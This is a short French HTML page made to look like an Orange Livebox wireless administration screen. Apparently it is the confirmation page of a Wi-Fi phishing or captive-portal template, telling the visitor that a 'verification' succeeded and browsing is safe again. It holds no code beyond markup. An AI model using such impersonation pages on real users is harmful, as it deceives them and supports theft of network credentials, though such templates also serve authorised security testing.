<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="Content-language" content="fr">
    <meta name="author" content="Lucien Burdet">
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <title>Interface Livebox d'Orange</title>
    <link rel="icon" type="image/png" href="./static/images/favicon.png" />
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/bootstrap.min.css'>
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/style.css'>
</head>

<body class="b-c-b">
    <img src="./static/images/favicon.png">
    <h3>Interface d'administration sans fil</h3>
    <p class="orange-color">La vérification a été correctement effectuée vous pouvez reprendre la navigation internet en toute sécurité avec votre Livebox d'Orange.</p>
</body>

</html>